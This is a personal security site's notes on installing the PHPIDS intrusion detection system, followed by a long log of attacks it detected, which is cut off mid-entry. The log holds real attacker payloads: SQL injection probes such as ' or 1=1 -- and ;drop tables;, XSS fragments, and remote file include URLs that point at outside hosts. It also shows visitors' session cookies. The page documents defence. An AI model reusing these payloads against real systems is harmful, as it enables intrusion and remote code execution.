Enter your search terms

Web IG Submit search form

Irongeek's Featured Links:

Web Hosting

Web Hosting

Free Web Hosting hosting

Keylogger

Document Scanning

Free Domain Names

Notebooks

Recover Data

Free Antivirus

hosted exchange 2007

EC-Council ECSA Training Videos

Photoluminescent Exit Signs

Web Hosting:
Help Irongeek.com pay for bandwidth and research equipment:

PHPIDS Installation and Test Page

        Since my page is mostly a home grown ghetto PHP CMS, I was interested in seeing what sort of attacks were being thrown against it. I found a project online Called PHPIDS, and here are my notes on installing it along with a list of recent attacks as reported by the IDS.

    1. First, download the PHPIDS from http://php-ids.org/downloads/ and extract it.

    2. I uploaded everything in the directory lib and below to my web folder.

    3. I'm a noob when it comes to MySQL, so I set up a new database in MySQL using the PHPMyAdmin front end. In the file lib\IDS\Log\Database.php you will find how the DB has to be set up. What it amounted to for me was just creating the needed table using the SQL command:

CREATE TABLE IF NOT EXISTS `intrusions` (
`id` int(11) unsigned NOT null auto_increment,
`name` varchar(128) NOT null,
`value` text NOT null,
`page` varchar(255) NOT null,
`ip` varchar(15) NOT null,
`impact` int(11) unsigned NOT null,
`origin` varchar(15) NOT null,
`created` datetime NOT null,
PRIMARY KEY (`id`)
) ENGINE=MyISAM ;

    4. By default, the Config.ini file is in \lib\IDS\Config. This is where you need to set up your database name, password, email address etc. Obviously, you don't want to leave this someplace where folks can just download it, in my case I moved it one folder up from the web root where thePHP install could still get to it (see note about paths in the next section) but a web browser hopefully can not. I also set mine to ignore some Google cookies by adding this to the Config.ini:

exceptions[] = __utmz
exceptions[] = __utmc
exceptions[] = COOKIE.__utmz
exceptions[] = COOKIE.__utmc
exceptions[] = REQUEST.__utmz
exceptions[] = REQUEST.__utmc

    5. I then created the following stub file (idsstub.php) to initiate the IDS:

    Things you will want to note: There are several places where you will need to change your path so it knows where the files are. I've noted them in the code above with the comment "Change this PATH." Setting the right paths is the biggest pain, and sorry, but I can't help you on your personal install. Also, make sure you point the config file to wherever you put Config.ini . I've also changed some of the user submitted data that the IDS checks. Folks can possibly slip in attacks via the HTTP ACCEPT for USER AGENT header fields. I had to comment out my user agent check as it caused too many false positive. On mine, I set it to pop up an image like the following if folks try to attack my site:



It's fun to be a wiseass to attackers. All hail Clippy!!!

    6. On every page I wanted to track attacks, I added the following line of PHP:
include ("idsstub.php");
In my case, I just put it in my footer.

    7. That's pretty much it. Check out my log below of the last 2000 detected attacks, mostly it's folks trying RFI (remote file includes):

Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
  Threshold: ---
  Ratio: ---
  Converted: ((++::

ID:	59578
Name:	COOKIE.alpha
Value:	153208ccf96d0000b4d6f74a9e0f0b0042f70000, de.gameduell.mediaserver=http://us-m1.gameduell.com, de.gameduell.flashserver=http://us-m1.gameduell.com, de.gameduell.avatarserver=http://m3.gameduell.de, WBWTID=38.105.109.12-4AF8211A27C0000031A7557-thetimetravelerswifemovie-r16s02, CFMAGIC=7836657:41543110, CFGLOBALS=urltoken=CFID#=28802786&CFTOKEN#=61047384#lastvisit={ts '2009-11-09 07:29:35'}#timecreated={ts '2009-11-09 07:29:35'}#hitcount=2#cftoken=61047384#cfid=28802786#, SITESERVER=GUID=79427B8D6A4C4D20A56A6F14F2D3DFF1, CFID=16911270, CFTOKEN=61891113, AwarenessNETSessionId=zafnyjbjv4tmdu550fy4ggys
Page:	/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10)
IP:	38.105.109.12
Impact:	70
Created:	2009-11-09 09:37:10
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: --- Ratio: --- Converted: ((++::

ID:	59575
Name:	REQUEST.page
Value:	' or 1=1 --
Page:	/i.php?page=%27%20or%201=1%20--
IP:	208.202.136.2
Impact:	44
Created:	2009-11-09 08:23:01
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:	59576
Name:	GET.page
Value:	' or 1=1 --
Page:	/i.php?page=%27%20or%201=1%20--
IP:	208.202.136.2
Impact:	44
Created:	2009-11-09 08:23:01
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:	59573
Name:	REQUEST.page
Value:	' or 1=1 --
Page:	/i.php?page=%27%20or%201=1%20--
IP:	208.202.136.2
Impact:	44
Created:	2009-11-09 08:14:22
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:	59574
Name:	GET.page
Value:	' or 1=1 --
Page:	/i.php?page=%27%20or%201=1%20--
IP:	208.202.136.2
Impact:	44
Created:	2009-11-09 08:14:22
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:	59569
Name:	REQUEST.bcsi-ac-CD2BF508A254B334
Value:	19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
Page:	/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:	170.167.4.200
Impact:	38
Created:	2009-11-09 07:02:39
Details:	Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.36

ID:	59570
Name:	REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:	19FF0D9000000005mCiD33igiFu1airzcF4s 91d8r8UAAAABQAAAJD8EQCAcAAAAAAAAPBZAAA=
Page:	/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:	170.167.4.200
Impact:	38
Created:	2009-11-09 07:02:39
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: --- Ratio: --- Converted: ((++::

ID:	59571
Name:	GET.bcsi-ac-CD2BF508A254B334
Value:	19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
Page:	/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:	170.167.4.200
Impact:	38
Created:	2009-11-09 07:02:39
Details:	Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.36

ID:	59572
Name:	COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:	19FF0D9000000005mCiD33igiFu1airzcF4s 91d8r8UAAAABQAAAJD8EQCAcAAAAAAAAPBZAAA=
Page:	/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:	170.167.4.200
Impact:	38
Created:	2009-11-09 07:02:39
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: --- Ratio: --- Converted: ((++::

ID:	59567
Name:	REQUEST.bcsi-ac-CD2BF508A254B334
Value:	19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
Page:	/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:	170.167.4.200
Impact:	14
Created:	2009-11-09 06:58:42
Details:	Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.36

ID:	59568
Name:	GET.bcsi-ac-CD2BF508A254B334
Value:	19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
Page:	/?bcsi-ac-CD2BF508A254B334=19FF0D6200000005yp9rQ8U7NRqbRXb7xyD2yDrIEaQOAAAABQAAAO7BDACAcAAAAAAAAN5UAAA=
IP:	170.167.4.200
Impact:	14
Created:	2009-11-09 06:58:42
Details:	Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: 3.49 Ratio: 2.36

ID:	59565
Name:	REQUEST.page
Value:	"
Page:	/i.php?page=%22
IP:	67.195.111.47
Impact:	12
Created:	2009-11-09 02:28:48
Details:	Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:	59566
Name:	GET.page
Value:	"
Page:	/i.php?page=%22
IP:	67.195.111.47
Impact:	12
Created:	2009-11-09 02:28:48
Details:	Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:	59563
Name:	REQUEST.page
Value:	;drop tables;
Page:	/i.php?page=;drop%20tables;
IP:	67.195.111.47
Impact:	12
Created:	2009-11-09 01:15:43
Details:	Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:	59564
Name:	GET.page
Value:	;drop tables;
Page:	/i.php?page=;drop%20tables;
IP:	67.195.111.47
Impact:	12
Created:	2009-11-09 01:15:43
Details:	Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:	59561
Name:	REQUEST.page
Value:	reviews/modernbill/samples/news.php?DIR=http://www.medisite.fr/id????
Page:	/i.php?page=reviews/modernbill/samples/news.php?DIR=http://www.medisite.fr/id????
IP:	86.65.110.157
Impact:	20
Created:	2009-11-09 01:07:43
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59562
Name:	GET.page
Value:	reviews/modernbill/samples/news.php?DIR=http://www.medisite.fr/id????
Page:	/i.php?page=reviews/modernbill/samples/news.php?DIR=http://www.medisite.fr/id????
IP:	86.65.110.157
Impact:	20
Created:	2009-11-09 01:07:43
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59557
Name:	REQUEST.path
Value:	/search, PREF=ID=e4b937d9bc71f1f0:TM=1257757337:LM=1257757337:S=qcOWQLsb3nlHDJ69
Page:	/i.php?page=videos/recovercookies
IP:	152.3.138.5
Impact:	30
Created:	2009-11-09 01:03:57
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59558
Name:	REQUEST.domain
Value:	.google.co.uk, NID=28=Xn_4yV7-6M6VzEt4WwiOGYZvCj0Gp2x_U761RPm2r_sacWBhLtYdqrxh5EN0b-qHmc8E2rpL04FqZCF9N_nmJTjsIi5iW5q6VSdTfWtlgE-yqJRbaPYkJUTzap09KNrU
Page:	/i.php?page=videos/recovercookies
IP:	152.3.138.5
Impact:	30
Created:	2009-11-09 01:03:57
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59559
Name:	COOKIE.path
Value:	/search, PREF=ID=e4b937d9bc71f1f0:TM=1257757337:LM=1257757337:S=qcOWQLsb3nlHDJ69
Page:	/i.php?page=videos/recovercookies
IP:	152.3.138.5
Impact:	30
Created:	2009-11-09 01:03:57
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:	59560
Name:	COOKIE.domain
Value:	.google.co.uk, NID=28=Xn_4yV7-6M6VzEt4WwiOGYZvCj0Gp2x_U761RPm2r_sacWBhLtYdqrxh5EN0b-qHmc8E2rpL04FqZCF9N_nmJTjsIi5iW5q6VSdTfWtlgE-yqJRbaPYkJUTzap09KNrU
Page:	/i.php?page=videos/recovercookies
IP:	152.3.138.5
Impact:	30
Created:	2009-11-09 01:03:57
Details:	Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:	59555
Name:	REQUEST.page
Value:	security/?sourcedir=http://gminamakow.info//dmdocuments/mambo??
Page:	/i.php?page=security/?sourcedir=http://gminamakow.info//dmdocuments/mambo??
IP:	87.139.66.104
Impact:	20
Created:	2009-11-08 23:45:20
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59556
Name:	GET.page
Value:	security/?sourcedir=http://gminamakow.info//dmdocuments/mambo??
Page:	/i.php?page=security/?sourcedir=http://gminamakow.info//dmdocuments/mambo??
IP:	87.139.66.104
Impact:	20
Created:	2009-11-08 23:45:20
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59553
Name:	REQUEST.page
Value:	videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:	/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML%5cShell%5cOpen%5cCommand
IP:	174.36.36.42
Impact:	6
Created:	2009-11-08 20:51:02
Details:	Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:	59554
Name:	GET.page
Value:	videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:	/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML%5cShell%5cOpen%5cCommand
IP:	174.36.36.42
Impact:	6
Created:	2009-11-08 20:51:02
Details:	Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:	59551
Name:	REQUEST.page
Value:	videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:	/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML%5CShell%5COpen%5CCommand
IP:	66.249.68.136
Impact:	6
Created:	2009-11-08 20:50:58
Details:	Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:	59552
Name:	GET.page
Value:	videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:	/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML%5CShell%5COpen%5CCommand
IP:	66.249.68.136
Impact:	6
Created:	2009-11-08 20:50:58
Details:	Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:	59549
Name:	REQUEST.page
Value:	videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:	/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
IP:	189.188.183.217
Impact:	6
Created:	2009-11-08 20:50:48
Details:	Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:	59550
Name:	GET.page
Value:	videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
Page:	/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cainFirefoxHTML\Shell\Open\Command
IP:	189.188.183.217
Impact:	6
Created:	2009-11-08 20:50:48
Details:	Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21

ID:	59547
Name:	REQUEST.page
Value:	-oldnews or der by 10--
Page:	/i.php?page=-oldnews+or+der+by+10--
IP:	67.195.111.47
Impact:	6
Created:	2009-11-08 19:39:43
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59548
Name:	GET.page
Value:	-oldnews or der by 10--
Page:	/i.php?page=-oldnews+or+der+by+10--
IP:	67.195.111.47
Impact:	6
Created:	2009-11-08 19:39:43
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59545
Name:	REQUEST.page
Value:	security//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo??
Page:	/i.php?page=security//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo??
IP:	87.139.66.104
Impact:	20
Created:	2009-11-08 18:24:55
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59546
Name:	GET.page
Value:	security//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo??
Page:	/i.php?page=security//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://gminamakow.info//dmdocuments/mambo??
IP:	87.139.66.104
Impact:	20
Created:	2009-11-08 18:24:55
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59543
Name:	REQUEST.page
Value:	security/change<font style=
Page:	/i.php?page=security/change%3Cfont%20style=
IP:	211.197.11.15
Impact:	8
Created:	2009-11-08 17:52:25
Details:	Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:	59544
Name:	GET.page
Value:	security/change<font style=
Page:	/i.php?page=security/change%3Cfont%20style=
IP:	211.197.11.15
Impact:	8
Created:	2009-11-08 17:52:25
Details:	Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:	59539
Name:	REQUEST.page
Value:	security///?_zb_path=http://www.hackengine.net/scan/id1?
Page:	/i.php?page=security///?_zb_path=http://www.hackengine.net/scan/id1?
IP:	81.176.229.7
Impact:	26
Created:	2009-11-08 12:40:27
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59540
Name:	GET.page
Value:	security///?_zb_path=http://www.hackengine.net/scan/id1?
Page:	/i.php?page=security///?_zb_path=http://www.hackengine.net/scan/id1?
IP:	81.176.229.7
Impact:	26
Created:	2009-11-08 12:40:27
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59541
Name:	REQUEST.page
Value:	security/phpids-install-notes///?_zb_path=http://www.hackengine.net/scan/id1?
Page:	/i.php?page=security/phpids-install-notes///?_zb_path=http://www.hackengine.net/scan/id1?
IP:	81.176.229.7
Impact:	26
Created:	2009-11-08 12:40:27
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59542
Name:	GET.page
Value:	security/phpids-install-notes///?_zb_path=http://www.hackengine.net/scan/id1?
Page:	/i.php?page=security/phpids-install-notes///?_zb_path=http://www.hackengine.net/scan/id1?
IP:	81.176.229.7
Impact:	26
Created:	2009-11-08 12:40:27
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59537
Name:	REQUEST.page
Value:	backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:	/i.php?page=backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:	121.124.127.164
Impact:	20
Created:	2009-11-08 12:20:38
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59538
Name:	GET.page
Value:	backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:	/i.php?page=backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:	121.124.127.164
Impact:	20
Created:	2009-11-08 12:20:38
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59535
Name:	REQUEST.page
Value:	backtrack-3-man/scrollkeeper-config //rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:	/i.php?page=backtrack-3-man/scrollkeeper-config%20%20//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:	121.124.127.164
Impact:	40
Created:	2009-11-08 12:20:37
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: --- Ratio: --- Converted: ((++:::

ID:	59536
Name:	GET.page
Value:	backtrack-3-man/scrollkeeper-config //rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:	/i.php?page=backtrack-3-man/scrollkeeper-config%20%20//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:	121.124.127.164
Impact:	40
Created:	2009-11-08 12:20:37
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: --- Ratio: --- Converted: ((++:::

ID:	59533
Name:	REQUEST.page
Value:	backtrack-3-man/scrollkeeper-config //rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:	/i.php?page=backtrack-3-man/scrollkeeper-config%20%20//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:	121.124.127.164
Impact:	40
Created:	2009-11-08 12:20:15
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: --- Ratio: --- Converted: ((++:::

ID:	59534
Name:	GET.page
Value:	backtrack-3-man/scrollkeeper-config //rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:	/i.php?page=backtrack-3-man/scrollkeeper-config%20%20//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:	121.124.127.164
Impact:	40
Created:	2009-11-08 12:20:15
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67 Centrifuge detection data Threshold: --- Ratio: --- Converted: ((++:::

ID:	59531
Name:	REQUEST.page
Value:	backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:	/i.php?page=backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:	121.124.127.164
Impact:	20
Created:	2009-11-08 12:20:14
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59532
Name:	GET.page
Value:	backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
Page:	/i.php?page=backtrack-3-man//rconfig.inc.php?config[root_dir]=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???
IP:	121.124.127.164
Impact:	20
Created:	2009-11-08 12:20:14
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59529
Name:	REQUEST.page
Value:	/*
Page:	/i.php?page=/%2A
IP:	67.195.111.47
Impact:	6
Created:	2009-11-08 10:49:16
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59530
Name:	GET.page
Value:	/*
Page:	/i.php?page=/%2A
IP:	67.195.111.47
Impact:	6
Created:	2009-11-08 10:49:16
Details:	Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:	59527
Name:	REQUEST.page
Value:	videos/owasp-top-5-louisville/index2.php?p=http://www.hackengine.net/scan/id1?
Page:	/i.php?page=videos/owasp-top-5-louisville/index2.php?p=http://www.hackengine.net/scan/id1?
IP:	81.176.229.7
Impact:	20
Created:	2009-11-08 07:25:37
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59528
Name:	GET.page
Value:	videos/owasp-top-5-louisville/index2.php?p=http://www.hackengine.net/scan/id1?
Page:	/i.php?page=videos/owasp-top-5-louisville/index2.php?p=http://www.hackengine.net/scan/id1?
IP:	81.176.229.7
Impact:	20
Created:	2009-11-08 07:25:37
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59525
Name:	REQUEST.page
Value:	videos/index2.php?p=http://www.hackengine.net/scan/id1?
Page:	/i.php?page=videos/index2.php?p=http://www.hackengine.net/scan/id1?
IP:	81.176.229.7
Impact:	20
Created:	2009-11-08 07:25:36
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59526
Name:	GET.page
Value:	videos/index2.php?p=http://www.hackengine.net/scan/id1?
Page:	/i.php?page=videos/index2.php?p=http://www.hackengine.net/scan/id1?
IP:	81.176.229.7
Impact:	20
Created:	2009-11-08 07:25:36
Details:	Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:	59523
Name:	REQUEST.page
